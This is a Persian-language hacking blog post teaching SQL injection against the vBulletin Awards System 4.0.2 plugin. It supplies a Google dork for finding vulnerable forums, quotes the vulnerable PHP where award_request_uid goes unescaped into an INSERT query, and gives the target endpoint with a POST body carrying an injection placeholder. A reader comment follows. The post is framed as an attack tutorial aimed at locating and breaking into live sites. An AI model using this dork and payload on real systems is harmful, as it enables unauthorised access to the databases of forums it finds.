تبلیغات
ناگفته های دنیای سایبری - vBulletin Awards System 4.0.2 SQL Injection
 
درباره وبلاگ


ناگفته های دنیای سایبری ناگفته هایی هست از چیزاهایی که شما از آن بی خبرید،از چیزهایی که شما در روی پرده می بینید و از پشت پرده غافلید:)

اینجا باهم تو این وبلاگ با هم بررسی میکنیم،می بینید که چه چیزی در دنیای سایبری جهان در حال گردش است.

آخرین رویداد های دنیای سایبری ،با ما باشید///

مدیر وبلاگ : 3V!L S}{@D0W™
نویسندگان
نظرسنجی
بیشتر از چه مطلبی استفاده کنیم؟










آمار وبلاگ
  • کل بازدید :
  • بازدید امروز :
  • بازدید دیروز :
  • بازدید این ماه :
  • بازدید ماه قبل :
  • تعداد نویسندگان :
  • تعداد کل پست ها :
  • آخرین بازدید :
  • آخرین بروز رسانی :


ناگفته های دنیای سایبری
You Are In Our ShadoW,So You Are Safe
صفحه نخست             تماس با مدیر           پست الکترونیک               RSS                  ATOM
یکشنبه 9 مهر 1391 :: نویسنده : 3V!L S}{@D0W™
یا الله


عرض سلام خدمت همه دوستان عزیز،بازدیدکنندگان گرامی///


خب در تو این پست میخوام بهتون inject  کردن VBulletin رو یادم بدم،اونم از طریق باگی که در سیستم Award  هست!

برای دیدن آموزش به ادامه مطلب مراجعه کنید :)


خب اول ما میاییم این درک(Dork) رو تو گوگل جست و جو میکنیم:


inurl:awards.php intext:"powered by vbulletin"


آسیب پذیری ما در شاخه موجوده: /request_award.php


Code:
$vbulletin->input->clean_array_gpc('p', array(
            'award_id' => TYPE_UINT,
            //'award_request_name' => TYPE_STR,
            //'award_request_recipient_name' => TYPE_STR,
            'award_request_reason' => TYPE_STR,
            'award_request_uid' => TYPE_UNIT,
    ));

> $award_request_uid = $vbulletin->GPC['award_request_uid'];
> > $db->query_write("INSERT INTO " . TABLE_PREFIX . "award_requests (award_req_uid, award_rec_uid, award_req_aid, award_req_reason) VALUES ('$award_request_uid', '$award_request_uid', '$award[award_id]', '". $db->escape_string($vbulletin->GPC['award_request_reason']) ."')");






Code:
http://example.com/request_award.php


Code:
POST: do=submit&name=award_id=[VALID REWARD ID]&award_request_reason=0&award_request_uid=0[SQL]&submit=Submit






نوع مطلب : مقالات آموزشی، آموزش های طبقه بندی شده، آموزش اکسپلویت نویسی، آموزش باگ ها، 
برچسب ها : هک ویبولیتین، Inject vBulletin، vBulletin Awards System 4.0.2 SQL Injection، Sql Injection، vBulletin 4.0.2 Sql injection، vb hacking، اکسپولیت ویبولتین،
لینک های مرتبط : منبع،


چهارشنبه 22 بهمن 1393 03:53 ب.ظ
khobalan ba ina chika konim??
ma chizzi balad nistim kamel toozi nadadi
 
لبخندناراحتچشمک
نیشخندبغلسوال
قلبخجالتزبان
ماچتعجبعصبانی
عینکشیطانگریه
خندهقهقههخداحافظ
سبزقهرهورا
دستگلتفکر
نظرات پس از تایید نشان داده خواهند شد.